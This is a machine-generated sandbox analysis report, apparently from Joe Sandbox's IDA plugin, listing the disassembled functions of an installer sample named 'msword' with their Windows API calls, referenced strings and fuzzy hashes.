                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                          • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                          • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                          • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                          • MulDiv.KERNEL32(00080C00,00000064,1F401F03), ref: 00403295
                                          • wsprintfW.USER32 ref: 004032A5
                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                          Strings
                                          • verifying installer: %d%%, xrefs: 0040329F
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: verifying installer: %d%%
                                          • API String ID: 1451636040-82062127
                                          • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                          • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                          • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                          • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                          • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                          • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                          • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":
                                          • API String ID: 589700163-165019052
                                          • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                          • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                          • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                          • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00401504
                                          • RegCloseKey.ADVAPI32(?), ref: 00401529
                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:
                                          • API String ID: 1912718029-0
                                          • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                          • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                          • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                          • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                          • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                          • GlobalFree.KERNEL32(007EE200), ref: 00402387
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 3376005127-0
                                          • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                          • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                          • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                          • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                          • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                          • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                          • String ID:
                                          • API String ID: 2568930968-0
                                          • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                          • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                          • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                          • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                          APIs
                                          • GetDlgItem.USER32(?), ref: 004020A3
                                          • GetClientRect.USER32(00000000,?), ref: 004020B0
                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                          • DeleteObject.GDI32(00000000), ref: 004020EE
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                          • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                          • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                          • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                          APIs
                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                          • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                          • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                          • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                          APIs
                                          • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                          • wsprintfW.USER32 ref: 00404483
                                          • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s
                                          • API String ID: 3540041739-3551169577
                                          • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                          • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                          • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                          • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                          APIs
                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          Strings
                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                          • API String ID: 1697273262-1764544995
                                          • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                          • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                          • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                          • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                          APIs
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                            • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                            • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                          • lstrlenW.KERNEL32 ref: 004026B4
                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                          • String ID: CopyFiles "%s"->"%s"
                                          • API String ID: 2577523808-3778932970
                                          • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                          • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                          • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                          • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: lstrcatwsprintf
                                          • String ID: %02x%c$...
                                          • API String ID: 3065427908-1057055748
                                          • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                          • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                          • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                          • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00405083
                                            • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                          • String ID: Section: "%s"$Skipping section: "%s"
                                          • API String ID: 2266616436-4211696005
                                          • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                          • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                          • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                          • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                          APIs
                                          • GetDC.USER32(?), ref: 00402100
                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,76F923A0,00000000), ref: 00406902
                                          • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                          • String ID:
                                          • API String ID: 1599320355-0
                                          • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                          • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                          • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                          • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                          APIs
                                            • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                          • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                          • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000F.00000002.1731568317.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000F.00000002.1731510988.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731601675.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000420000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.0000000000434000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731647194.000000000046B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000F.00000002.1731920852.0000000000500000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                          Similarity
                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                          • String ID: Version
                                          • API String ID: 512980652-315105994
                                          • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                          • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                          • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                          • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                          APIs
